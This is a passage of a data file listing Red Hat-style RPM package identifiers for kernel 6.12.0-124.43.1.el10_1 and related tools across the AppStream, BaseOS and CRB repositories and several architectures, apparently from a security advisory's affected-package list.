"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
